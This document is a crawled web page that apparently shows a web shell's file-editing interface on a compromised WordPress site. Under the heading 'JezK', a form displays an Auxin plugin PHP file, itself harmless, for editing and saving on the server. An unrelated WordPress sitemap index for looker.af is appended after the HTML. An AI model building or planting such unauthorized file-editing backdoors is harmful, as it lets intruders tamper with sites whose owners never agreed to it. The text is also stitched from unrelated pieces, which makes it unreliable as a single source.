
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: class-auxin-admin-dashboard.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Admin Dashboard Widgets
 *
 * 
 * @package    Auxin
 * @license    LICENSE.txt
 * @author     averta
 * @link       http://phlox.pro/
 * @copyright  (c) 2010-2024 averta
*/

// no direct access allowed
if ( ! defined( &#039;ABSPATH&#039; ) )  exit;


if ( ! class_exists( &#039;Auxin_Admin_Dashboard&#039; ) ) :

/**
 * Auxin_Admin_Dashboard Class
 */
class Auxin_Admin_Dashboard {

  /**
   * Hook in admin dashboards
   */
    public function __construct() {

        if ( current_user_can( &#039;manage_options&#039; ) ) {
            add_action( &#039;wp_dashboard_setup&#039;, array( $this, &#039;init&#039; ) );
        }
    }

  /**
   * Add dashboard widgets on dashboard setup
   */
    public function init() {
        wp_add_dashboard_widget( &#039;auxin_dashboard_status&#039;, sprintf( __( &#039;%s Status&#039;, &#039;auxin-elements&#039; ), THEME_NAME ), array( $this, &#039;status_widget&#039; ) );
    }

   /**
    * Show theme status widget
    */
    public function status_widget() {
        $auxin_active_post_types = auxin_get_possible_post_types( true );

        $post_types = get_post_types( array( &#039;_builtin&#039; =&gt; false ), &#039;objects&#039; );

        echo &#039;&lt;table&gt;&#039;;
        foreach( $post_types as $pt =&gt; $args ) {
            if( isset( $auxin_active_post_types[ $pt ] ) &amp;&amp; $auxin_active_post_types[$pt] ){
                $edit_url = &#039;edit.php?post_type=&#039;. $pt;
                echo &#039;&lt;tr&gt;&lt;td class=&quot;t&quot;&gt;&lt;a href=&quot;&#039;. esc_url( $edit_url ) .&#039;&quot;&gt;&#039;. esc_html( $args-&gt;labels-&gt;name ) .&#039;&lt;/a&gt;&lt;/td&gt;&lt;td class=&quot;b&quot;&gt;( &#039;. esc_html( wp_count_posts( $pt )-&gt;publish ) .&#039; )&lt;/td&gt;&lt;/tr&gt;&#039;;
            }
        }
        echo &#039;&lt;/table&gt;&#039;;
    }

}

endif;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
